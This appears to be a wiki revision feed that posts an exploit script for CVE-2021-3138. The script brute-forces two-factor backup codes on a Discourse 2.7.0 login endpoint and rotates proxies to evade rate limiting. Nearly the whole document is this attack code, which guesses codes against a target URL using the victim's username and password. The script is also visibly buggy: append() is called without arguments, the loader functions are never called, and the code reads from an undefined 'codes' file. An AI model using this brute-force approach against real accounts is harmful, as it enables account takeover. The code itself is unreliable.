https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-3138_Discourse_2.7.0_2FA%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E CVE-2021-3138 Discourse 2.7.0 2FA繞過漏洞 - Revision history 2026-04-10T01:53:30Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2021-3138_Discourse_2.7.0_2FA%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&diff=1847&oldid=prev Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Discourse 2.7.0 - Rate Limit Bypass leads to 2FA Bypass # Date: 14/01/2021 # Exploit Author: Mesh3l_911 # Vendor Homepage: https://www.discourse..." 2021-04-21T10:06:46Z <p>Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Discourse 2.7.0 - Rate Limit Bypass leads to 2FA Bypass # Date: 14/01/2021 # Exploit Author: Mesh3l_911 # Vendor Homepage: https://www.discourse...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: Discourse 2.7.0 - Rate Limit Bypass leads to 2FA Bypass<br /> # Date: 14/01/2021<br /> # Exploit Author: Mesh3l_911<br /> # Vendor Homepage: https://www.discourse.org/<br /> # Software Link:https://github.com/discourse/discourse<br /> # Version: Discourse 2.7.0<br /> # CVE: CVE-2021-3138<br /> <br /> import requests<br /> <br /> username = input(&quot;\n input ur username : &quot;)<br /> password = input(&quot;\n input ur password : &quot;)<br /> session=requests.session()<br /> <br /> proxies = []<br /> def proxies():<br /> proxies_path = input(&quot;\n input ur proxies path : &quot;)<br /> <br /> with open(proxies_path, 'r') as prox:<br /> for _ in prox.read().splitlines():<br /> proxies.append()<br /> <br /> backup_codes = []<br /> def backup_list():<br /> Backup_codes = input(&quot;\n input ur Backup_codes list path : &quot;)<br /> <br /> with open(Backup_codes, 'r') as codes:<br /> for _ in codes.read().splitlines():<br /> backup_codes.append()<br /> <br /> def exploit():<br /> with open('Backup_codes.txt', 'w') as results:<br /> try:<br /> for __ in proxies:<br /> for _ in codes.read().splitlines():<br /> header =\<br /> {<br /> &quot;X-CSRF-Token&quot;: &quot;ur X-CSRF-Token&quot;,<br /> &quot;Cookie&quot;: &quot;ur Cookie&quot;,<br /> &quot;X-Requested-With&quot;: &quot;XMLHttpRequest&quot;<br /> }<br /> body = {&quot;login&quot;: username, &quot;password&quot;: password, &quot;second_factor_token&quot;: _, &quot;second_factor_method&quot;: &quot;2&quot;}<br /> request = session.post(&quot;ur target_url&quot;, headers=header, data=body, proxies={'http': __, 'https':__})<br /> source = request.text<br /> backup_codes.remove(_)<br /> <br /> if request.status_code == 200:<br /> if '&quot;id&quot;' in source:<br /> results.write(&quot;The Backup_Coude is &gt; {} &quot;.format(_))<br /> return True<br /> else:<br /> pass<br /> else:<br /> proxies.remove(__)<br /> break<br /> <br /> <br /> except requests.exceptions.SSLError and requests.exceptions.ConnectionError:<br /> print(&quot; Connection Failed :( &quot;)<br /> <br /> results.close()<br /> <br /> <br /> def main():<br /> if exploit():<br /> print(&quot;\n Found :) \n&quot;)<br /> else:<br /> print(&quot;\n Please re-check ur inputs :( \n&quot;)<br /> if __name__ == '__main__':<br /> main()<br /> <br /> &lt;/pre&gt;</div> Pwnwiki